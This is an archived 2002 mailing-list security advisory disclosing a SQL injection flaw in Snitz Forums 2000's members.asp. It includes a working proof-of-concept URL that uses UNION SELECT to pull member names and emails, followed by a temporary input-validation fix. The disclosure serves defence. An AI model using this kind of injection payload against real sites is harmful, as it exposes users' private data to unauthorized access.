OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: acemi (acemi_5yahoo.com)
Date: Fri Apr 19 2002 - 16:06:46 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) vulnerable
    ----------
    Product : Snitz Forums 2000
    Version :
    3.3
    3.3.01
    3.3.02
    3.3.03 (last stable version)
    Object : members.asp
    Class : Input validation error (remote SQL query
    manipulation vulnerability)
    Vendor-URL : http://forum.snitz.com/
    Vendor-Status : informed, not patched
    Remote-Exploit : yes


    Introduction
    ------------
    Snitz Forums 2000 is open source ASP-based web
    forum software. It runs on Microsoft Windows
    operating systems. A vulnerability exists in Snitz
    Forums 2000 which makes it possible for a malicious
    user to remotely manipulate the logic of SQL queries.
    As a result, it may be possible for attackers to view all
    data in the forum's database. This vulnerability can
    be exploited with a web browser.

    More Details
    ------------
    In members.asp page, when listing the members
    with a criteria, the input (M_NAME) is not checked for
    malicious code. As a result, an attacker can add
    extra SELECT statement to the query with UNION
    and he/she can view any data in the forum's
    database.


    Proof-of-concept
    ----------------
    Normally, to view the members' list whose
    membername start with 'A', members.asp page is
    used as the following:

    /members.asp?
    mode=search&M_NAME=A&initial=1&method=


    Use this link to view the vulnerability:

    /members.asp?mode=search&M_NAME=XXXX%
    25')%20UNION%20SELECT%20MEMBER_ID,%
    20M_STATUS,%20M_NAME%20%2B%20'/'%20%
    2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
    20M_EMAIL,%20M_COUNTRY,%
    20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%
    20M_AIM,%20M_TITLE,%20M_POSTS,%
    20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
    20M_DATE,%20M_STATE%20FROM%
    20FORUM_MEMBERS%20WHERE%20(M_NAME%
    20LIKE%20'&initial=1&method=

    MEMBERNAME column will be
    MEMBERNAME/EMAIL/ column.


    Temporary fix
    -------------
    To fix this bug, in members.asp , change the
    following lines :

    SearchName = Request("M_NAME")
    if SearchName = "" then
    SearchName = Request.Form("M_NAME")
    end if


    with :

    if IsValidString(Request("M_NAME")) then
    SearchName = Request("M_NAME")
    end if

    if SearchName = "" then
    if IsValidString(Request.Form("M_NAME")) then
    SearchName = Request.Form("M_NAME")
    end if
    end if


    and in function IsValidString(sValidate) in
    inc_functions.asp , change the following line:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

    with :

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"